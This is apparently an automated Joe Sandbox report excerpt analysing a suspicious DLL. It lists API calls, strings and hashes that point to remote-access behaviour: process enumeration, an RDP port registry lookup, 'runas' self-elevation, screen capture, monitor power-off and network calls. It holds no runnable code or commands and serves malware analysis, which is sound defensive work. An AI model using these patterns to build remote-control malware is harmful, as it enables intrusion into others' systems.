                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateHandleSleepThread_snprintfclosesocketinet_addrrecv
                                                          • String ID:
                                                          • API String ID: 1576220768-0
                                                          • Opcode ID: efdff814b33b8202b6fd591e2a201419e304869a90dd133dfa35aec09eac1fc2
                                                          • Instruction ID: c4cf38fdf5401ec59896369bf81f1cbf2d42b6e420d5ad3730b6c5288892d0d0
                                                          • Opcode Fuzzy Hash: efdff814b33b8202b6fd591e2a201419e304869a90dd133dfa35aec09eac1fc2
                                                          • Instruction Fuzzy Hash: 5D31B178104355ABD310DF54DC80F9B77E8FBC8740F50492DFA88933A1D775A9468BA2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: malloc$Tablefree
                                                          • String ID:
                                                          • API String ID: 2903114640-0
                                                          • Opcode ID: 86186fa1577d632ba100a165714a33ce1776c10956f63b3ae715142a8fd396b4
                                                          • Instruction ID: a9296b02b71586264760a7329d97d0c6985c525f31e5c152af02a019acfba51a
                                                          • Opcode Fuzzy Hash: 86186fa1577d632ba100a165714a33ce1776c10956f63b3ae715142a8fd396b4
                                                          • Instruction Fuzzy Hash: 8C1144736022246BD315CA1EBC81BDFB3D8FBC1661F14052AF919CB240DB25EE8586E2
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002BE71
                                                          • Process32First.KERNEL32(00000000,00000000), ref: 1002BE8B
                                                          • _strcmpi.MSVCRT ref: 1002BEA7
                                                          • Process32Next.KERNEL32(00000000,?), ref: 1002BEB6
                                                          • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 1002BEC0
                                                          • CloseHandle.KERNEL32(00000000,?,75A38400), ref: 1002BED3
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32_strcmpi
                                                          • String ID:
                                                          • API String ID: 2975077063-0
                                                          • Opcode ID: f37c4a8f1e108d711664304603285570b95f9b7a6bb29a86161c82b5fdfa154d
                                                          • Instruction ID: 6ed28245b0ed33383696f76e5f749c63f4d2afb73675a39276b596060f345c94
                                                          • Opcode Fuzzy Hash: f37c4a8f1e108d711664304603285570b95f9b7a6bb29a86161c82b5fdfa154d
                                                          • Instruction Fuzzy Hash: 6F01B17A1016116EE750EB24EC80ADF73D9FB85361F854929FE5882280DB3CA91986B2
                                                          APIs
                                                          • wsprintfA.USER32 ref: 1002516A
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • lstrlenA.KERNEL32(?), ref: 10025196
                                                          • lstrlenA.KERNEL32(?), ref: 100251A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823lstrlen$AddressLibraryLoadProcwsprintf
                                                          • String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
                                                          • API String ID: 2676723305-3034822107
                                                          • Opcode ID: 2c1f5070db8a4b7e35b2bf510d3ccaee469d158e4b5e32a747980c0f01309f3c
                                                          • Instruction ID: 07e6f760477bac333c424709a16e2736ed7e486a252221b6b018aa095331e521
                                                          • Opcode Fuzzy Hash: 2c1f5070db8a4b7e35b2bf510d3ccaee469d158e4b5e32a747980c0f01309f3c
                                                          • Instruction Fuzzy Hash: B30149B23002143FE7249224DC42FFB739AEFC8314F40483DFB05A7280DA79AD4586A6
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: getenvmallocsscanf
                                                          • String ID: %ld%c$JPEGMEM$x
                                                          • API String ID: 677315340-3402169052
                                                          • Opcode ID: 8ea0386d3c4958d7858928c8dcae0d19ada14aa46442e30d69938e83600899c2
                                                          • Instruction ID: f96980eed612b48693667c15894a15213f9622dcf7bb22cb4eb33f436598584c
                                                          • Opcode Fuzzy Hash: 8ea0386d3c4958d7858928c8dcae0d19ada14aa46442e30d69938e83600899c2
                                                          • Instruction Fuzzy Hash: AD4159B04447868FD320CF19E880957FBF8FF45344B904A6EE19A8B651E776E909CF81
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000EC48
                                                            • Part of subcall function 1000EBE0: GetVersionExA.KERNEL32 ref: 1000EBF3
                                                          • ShellExecuteExA.SHELL32(0000003C), ref: 1000ECE7
                                                          • ExitProcess.KERNEL32 ref: 1000ECF5
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteExitFileModuleNameProcessShellVersion
                                                          • String ID: <$runas
                                                          • API String ID: 984616556-1187129395
                                                          • Opcode ID: f3f26a1f37ebc56c2e8fe9b480a5dc3c289569165e6538ef6aaa3bf10f4102be
                                                          • Instruction ID: 17113ab1ae356f6cc16b3b480fb140d325540a2caf6588daec690853a855f2e8
                                                          • Opcode Fuzzy Hash: f3f26a1f37ebc56c2e8fe9b480a5dc3c289569165e6538ef6aaa3bf10f4102be
                                                          • Instruction Fuzzy Hash: 9721D5711087849FE314DB68C8147EBB7D6FBC4350F400A2DEB9A932D0DBB59A09CB96
                                                          APIs
                                                          • ShellExecuteExA.SHELL32 ref: 10009EC1
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10009ED2
                                                          • CloseHandle.KERNEL32(?), ref: 10009EDD
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExecuteHandleObjectShellSingleWait
                                                          • String ID: <$@
                                                          • API String ID: 3837156514-1426351568
                                                          • Opcode ID: a256fbbcab775a1f3604715199f882c7f0444da02567230ad93e6343b4ac91f9
                                                          • Instruction ID: 4f3a71a7022bf43642dcc1f3ab8c414678e0bae02fb7ae8385496add38081c6f
                                                          • Opcode Fuzzy Hash: a256fbbcab775a1f3604715199f882c7f0444da02567230ad93e6343b4ac91f9
                                                          • Instruction Fuzzy Hash: 86F08C715083409BE704CF28C848A5BBBE4BFC4350F084A2DF289972A0DBB6DA44CB96
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                          • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                          • FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: RtlGetNtVersionNumbers$ntdll.dll
                                                          • API String ID: 145871493-1263206204
                                                          • Opcode ID: a98ca3340a1305be5a7cfcd569fd1683611f9d629b3645fd6081658504a1bc25
                                                          • Instruction ID: d7f270ee10dbe0d5443bb834cdf5db42320fa0b4d044a01f975dae71d1b6a05e
                                                          • Opcode Fuzzy Hash: a98ca3340a1305be5a7cfcd569fd1683611f9d629b3645fd6081658504a1bc25
                                                          • Instruction Fuzzy Hash: 02F0307A3016226BD3619B29DC8899B77A9EFC6710B164A28F808D7240D738D842C6B1
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,WaitForSingleObject,?,10016C10,?,?,?,?,?,10098A80,000000FF), ref: 10010B7D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10010B84
                                                          • Sleep.KERNEL32(00000096,?,?,?,?,?,10098A80,000000FF), ref: 10010B97
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: KERNEL32.dll$WaitForSingleObject
                                                          • API String ID: 188063004-3889371928
                                                          • Opcode ID: 1505c6372a6b5f5a7e2015909548fb5756e583b9251caf1c5d531eae02cc10d3
                                                          • Instruction ID: 2f25d5efcf6a9ea09ffc80339e96632aadd97f0a1fca395ea0de9424a810f75f
                                                          • Opcode Fuzzy Hash: 1505c6372a6b5f5a7e2015909548fb5756e583b9251caf1c5d531eae02cc10d3
                                                          • Instruction Fuzzy Hash: 67D0C7790041256BEA2457A4AD4CDEA3654FB493317040744F525512D1CE609C40C770
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea42a18e97e3a82291b809ecb384a12a17950c0088f0337ebea46ea9f423f3cf
                                                          • Instruction ID: c650882347852e35ffcbb4eb416d17d698f5a118f4f7130cf3c30c4ac611ed04
                                                          • Opcode Fuzzy Hash: ea42a18e97e3a82291b809ecb384a12a17950c0088f0337ebea46ea9f423f3cf
                                                          • Instruction Fuzzy Hash: E141D5B27003056FF704DF689C81B6777D9FB48395F24452AFA05DB686DB71E80487A0
                                                          APIs
                                                            • Part of subcall function 10005230: #823.MFC42 ref: 1000525B
                                                            • Part of subcall function 10005230: #823.MFC42(?), ref: 1000526A
                                                          • lstrlenA.KERNEL32(?), ref: 1002945B
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 10029478
                                                          • lstrlenA.KERNEL32(?), ref: 100294B8
                                                          • LocalSize.KERNEL32(00000000), ref: 100294FC
                                                          • LocalFree.KERNEL32(00000000), ref: 1002950E
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$#823lstrlen$AllocFreeSize
                                                          • String ID:
                                                          • API String ID: 933119475-0
                                                          • Opcode ID: de1fdc764fb6d7af8fcdc614c3befe84ce97db36611e3d77dc9292dca938265c
                                                          • Instruction ID: baa6dfe5b62ae598e36d45df49c35083ba28316c69925bc8e8f86ac0ab45f9a0
                                                          • Opcode Fuzzy Hash: de1fdc764fb6d7af8fcdc614c3befe84ce97db36611e3d77dc9292dca938265c
                                                          • Instruction Fuzzy Hash: A331B0756083418FD310DF18C884B5BB7E0FB89750F940A1CF896A7390DB34E906CBA2
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?), ref: 10017309
                                                          • CloseHandle.KERNEL32(?), ref: 10017316
                                                          • #823.MFC42(00000110), ref: 1001733A
                                                          • #823.MFC42(00000110), ref: 1001736B
                                                            • Part of subcall function 10018A50: LoadCursorA.USER32(00000000,00000000), ref: 10018B13
                                                          • #823.MFC42(00000110), ref: 10017392
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$CloseCursorHandleLoadObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1032503192-0
                                                          • Opcode ID: 4d1a71cbad2e8490f7bdd0b7b2d5e33d221c358bfa213511aab1859ad13583ec
                                                          • Instruction ID: 5a9ae8d5125f4473acdfdc2c571faec41a6d57683b79152a5b2af942287cdb62
                                                          • Opcode Fuzzy Hash: 4d1a71cbad2e8490f7bdd0b7b2d5e33d221c358bfa213511aab1859ad13583ec
                                                          • Instruction Fuzzy Hash: 0E31A0746447419BE724CF348C06BCABAE1FF49700F000A2DF6AA9B2C1D7B1E684C792
                                                          APIs
                                                          • CreateDIBSection.GDI32(10019096,?,00000000,10019096,00000000,00000000), ref: 100192BE
                                                          • SelectObject.GDI32(?,00000000), ref: 100192CD
                                                          • BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 100192EA
                                                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001930A
                                                          • DeleteObject.GDI32(?), ref: 10019332
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object$CreateDeleteSectionSelect
                                                          • String ID:
                                                          • API String ID: 3188413882-0
                                                          • Opcode ID: c47ec7ba65a712e0d1f3a3476198e4529758ddf825267e59d987f02d8c4fa404
                                                          • Instruction ID: 171a801546ab23d17400ea9514ceaa77a6b5348b798b605dacd974edddfe344e
                                                          • Opcode Fuzzy Hash: c47ec7ba65a712e0d1f3a3476198e4529758ddf825267e59d987f02d8c4fa404
                                                          • Instruction Fuzzy Hash: C831D2B6200705AFD214DF59CC84E27F7AAFB88600F148A1EFA5987791C771F9008BA0
                                                          APIs
                                                          • #825.MFC42(?,?), ref: 10021631
                                                          • #825.MFC42(?), ref: 1002168E
                                                          • ??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 100216A2
                                                          • ??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 100216C5
                                                          • #825.MFC42(00000000), ref: 100216D0
                                                            • Part of subcall function 10022900: #825.MFC42(?,?,1012C4B0,?,1002162E,?), ref: 10022922
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #825$Lockit@std@@$??0_??1_
                                                          • String ID:
                                                          • API String ID: 3320149174-0
                                                          • Opcode ID: 92a739d06bdc15bc2c0b8dbff828faa4f9d8d67b9b0aa77d23071a609134f6d1
                                                          • Instruction ID: d069f6ed0b23540ba227ea0268739682af56c83980c4ac9031e4afce5f99edac
                                                          • Opcode Fuzzy Hash: 92a739d06bdc15bc2c0b8dbff828faa4f9d8d67b9b0aa77d23071a609134f6d1
                                                          • Instruction Fuzzy Hash: EE31AEB96007559FC710DFA8E8C485EB3E9FB98750799481DE85A83A00EB34FD048B92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID: y$y
                                                          • API String ID: 2038078732-2085659379
                                                          • Opcode ID: dc452fb532a8b3440562dfce708e2233d078e41fe58a17104d6ab9b3988a5d1b
                                                          • Instruction ID: b3f128dd8a4f2f937591d2b39a566a4fd65ce5111e4adbe3f1b9da6999f925d3
                                                          • Opcode Fuzzy Hash: dc452fb532a8b3440562dfce708e2233d078e41fe58a17104d6ab9b3988a5d1b
                                                          • Instruction Fuzzy Hash: F0212C796082145BD200DB68BC95AAF77D9EBC4610F440439FD49D7341DBB5EA0982E7
                                                          APIs
                                                          • #6662.MFC42(0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468,00000000,100114A3,00000000,00000000,00000000), ref: 10011A82
                                                          • #4278.MFC42(1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468,00000000,100114A3), ref: 10011A9E
                                                          • #6883.MFC42(?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468), ref: 10011AB2
                                                          • #800.MFC42(?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798,000000FF,10011468), ref: 10011AC3
                                                          • #6662.MFC42(0000005C,00000001,?,00000000,1001150F,-00000002,00000000,0000005C,-00000002,00000000,00000000,?,00000001,00000000,?,10098798), ref: 10011AD0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #6662$#4278#6883#800
                                                          • String ID:
                                                          • API String ID: 2113711092-0
                                                          • Opcode ID: 774a556c8fd2fdb14a6c748a972ff41b9b256d90f559a08a3d16b273acc7db09
                                                          • Instruction ID: f4fe6630835c94391bfcc8c2be099bdb1318b56aaed041f5013be16c963cdde2
                                                          • Opcode Fuzzy Hash: 774a556c8fd2fdb14a6c748a972ff41b9b256d90f559a08a3d16b273acc7db09
                                                          • Instruction Fuzzy Hash: A611F0363016159BDB18DE29DC45BAEBB95EF846B0F81072CF82A8B2C0DA34EC458691
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,?,00000001,00000000,?,?,00000065,1000878E,00000001,00000001,?,00000001,00000001,00000001), ref: 1000956E
                                                          • LocalAlloc.KERNEL32(00000040,00019000,?,?,00000065,1000878E), ref: 10009583
                                                          • ReadFile.KERNEL32(?,00000009,00018FF7,?,00000000,?,?,00000065,1000878E), ref: 100095B0
                                                          • LocalFree.KERNEL32(00000000,?,?,00000065,1000878E), ref: 100095CD
                                                          • LocalFree.KERNEL32(00000000,?,?,00000065,1000878E), ref: 100095E7
                                                            • Part of subcall function 10009600: CloseHandle.KERNEL32(?,00000000,100095E2,?,?,00000065,1000878E), ref: 1000960F
                                                            • Part of subcall function 10009600: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,00000001,00000000,100095E2,?,?,00000065,1000878E), ref: 1000963C
                                                            • Part of subcall function 10009600: #825.MFC42(00000001,?,?,00000065,1000878E), ref: 10009643
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$FileFree$#825AllocCloseD@2@@std@@D@std@@HandlePointerReadTidy@?$basic_string@U?$char_traits@V?$allocator@
                                                          • String ID:
                                                          • API String ID: 1358099757-0
                                                          • Opcode ID: 63df56e09b5848d09f2d368d6da1cb594e9dd00ae11557fb136ebf9b1cc4f06e
                                                          • Instruction ID: c1002f4ed646788d97939a754a35c43ee484aff7721c1be338d8eb9f0dbbf468
                                                          • Opcode Fuzzy Hash: 63df56e09b5848d09f2d368d6da1cb594e9dd00ae11557fb136ebf9b1cc4f06e
                                                          • Instruction Fuzzy Hash: 911172B63007029BE310CF69DC84B97B7E9FB88361F148A29F655C7281C730E815CB65
                                                          APIs
                                                            • Part of subcall function 10010B70: LoadLibraryA.KERNEL32(KERNEL32.dll,WaitForSingleObject,?,10016C10,?,?,?,?,?,10098A80,000000FF), ref: 10010B7D
                                                            • Part of subcall function 10010B70: GetProcAddress.KERNEL32(00000000), ref: 10010B84
                                                            • Part of subcall function 10010B70: Sleep.KERNEL32(00000096,?,?,?,?,?,10098A80,000000FF), ref: 10010B97
                                                            • Part of subcall function 10016FB0: GetDeviceCaps.GDI32(?,00000076), ref: 10016FE0
                                                            • Part of subcall function 10016FB0: GetDeviceCaps.GDI32(?,00000075), ref: 10016FF3
                                                          • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 10016CA5
                                                          • SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 10016CB8
                                                          • Sleep.KERNEL32(000000C8), ref: 10016CF5
                                                            • Part of subcall function 10016640: InterlockedExchange.KERNEL32(?,00000000), ref: 1001666A
                                                            • Part of subcall function 10016640: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,10098A71,000000FF), ref: 10016675
                                                            • Part of subcall function 10016640: CloseHandle.KERNEL32(?,?,?,?,?,?,10098A71,000000FF), ref: 10016682
                                                            • Part of subcall function 10016640: #823.MFC42(000001F0), ref: 100166B0
                                                            • Part of subcall function 10016640: InterlockedExchange.KERNEL32(?,00000001), ref: 1001676D
                                                          • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 10016CD4
                                                          • SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 10016CE7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CapsDeviceExchangeInfoInterlockedMessageParametersSendSleepSystem$#823AddressCloseHandleLibraryLoadObjectProcSingleWait
                                                          • String ID:
                                                          • API String ID: 2254935227-0
                                                          • Opcode ID: 69c5405765d8cd14f1056ea885181365182fd0a05cfc07f6a81b8f4b8d9126f7
                                                          • Instruction ID: ff05f8586191e565f2e6c2b158e0b16d5a6b007ebb4d99bd3008ae6250e7dcc5
                                                          • Opcode Fuzzy Hash: 69c5405765d8cd14f1056ea885181365182fd0a05cfc07f6a81b8f4b8d9126f7
                                                          • Instruction Fuzzy Hash: 5711E13438435969E960EB244C52FAA7796EF49B50F200139BF49AF2D3C9F4F8849564
                                                          APIs
                                                          • #823.MFC42(00000018,?,?,?,?,100215C5,100215A5,?,?,100215A5), ref: 1002245E
                                                          • ??0_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,100215A5), ref: 10022478
                                                          • ??1_Lockit@std@@QAE@XZ.MSVCP60(?,?,?,?,?,100215A5), ref: 100224AA
                                                          • #825.MFC42(00000000,?,?,?,?,?,100215A5), ref: 100224B5
                                                          • #823.MFC42(00000018,?,?,?,?,?,100215A5), ref: 100224C5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823Lockit@std@@$#825??0_??1_
                                                          • String ID:
                                                          • API String ID: 2469163743-0
                                                          • Opcode ID: f025e2dd79729062f08b7a7721333646b4a01c05b3f9230da3a5a91d9fb2e898
                                                          • Instruction ID: 8355ca7f01a83ae40642ce5fe98aa8143934db94241ffe974ce41ae393d7af5b
                                                          • Opcode Fuzzy Hash: f025e2dd79729062f08b7a7721333646b4a01c05b3f9230da3a5a91d9fb2e898
                                                          • Instruction Fuzzy Hash: 36119DB1505345AFC300DF99E8C0856FBE4FF58310B55806EE58987B22D774B945CB92
                                                          APIs
                                                          • WTSQuerySessionInformationW.WTSAPI32 ref: 10024AB4
